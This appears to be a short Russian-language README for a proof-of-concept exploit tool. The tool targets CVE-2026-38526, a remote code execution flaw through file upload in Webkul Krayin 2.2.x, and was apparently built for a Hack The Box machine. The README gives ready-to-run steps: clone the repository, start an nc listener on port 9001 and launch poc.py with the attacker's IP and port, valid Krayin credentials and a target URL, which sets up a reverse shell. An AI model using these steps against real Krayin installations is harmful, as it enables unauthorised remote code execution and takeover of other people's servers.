
Скрипт PoC для CVE-2026-38526, RCE через уязвимость загрузки файлов в конечной точке /admin/tinymce/upload системы webkul krayin 2.2.x
PoC-скрипт для CVE-2026-38526, удаленное выполнение кода (RCE) через уязвимость загрузки файлов в эндпоинте /admin/tinymce/upload веб-приложения webkul krayin 2.2.x (создан для htb-nexus)
git clone https://github.com/Resolvdd/CVE-2026-38526-PoC-htb-nexus.git
cd CVE-2026-38526-PoC-htb-nexus
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
nc -lvnp <номер-порта> (По умолчанию: 9001)
python3 poc.py -i <ваш-ip> -p <номер-порта-слушателя> -e <действительный-email-krayin> -P <действительный-пароль-krayin> -u <url-без-протокола По умолчанию: http>